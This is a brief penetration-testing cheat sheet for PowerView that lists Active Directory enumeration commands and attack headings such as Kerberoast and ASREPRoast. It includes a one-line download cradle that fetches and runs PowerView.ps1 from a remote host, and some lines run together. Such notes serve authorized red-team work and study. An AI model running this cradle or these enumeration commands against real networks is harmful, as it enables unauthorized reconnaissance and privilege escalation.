PowerView
Extra: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
Import-Module
Import-Module PowerView.ps1
. .\PowerView.ps1
iex(new-object net.webclient).DownloadString('http://10.10.10.10/PowerView.ps1')Get-Domain
Get-Domain
Get-Domain -Domain vulnableone.localGet-DomainSID
Get-DomainSID
Get-DomainSID -Domain vulnableone.localGet-DomainController
Get-DomainController | select Forest, Name, OSVersion | fl
Get-DomainController -Domain vulnableone.localGet-DomainPolicyData
Get-DomainUser
Get-DomainComputer
Get-DomainOU
Get-DomainGroup
Get-DomainGPO
Get-DomainGPOLocalGroup
Get-DomainGPOUserLocalGroupMapping
This is useful for finding where domain groups have local admin access.
Get-DomainObjectACL
GenericAll
Users
Group
GenericWrite
User
Computer
Get-DomainTrust
Get-ForestDomain
Kerberoast
ASREPRoast
Unconstrained Delegation
Constrained Delegation
Find-DomainShare
Find-LocalAdminAccess
Last updated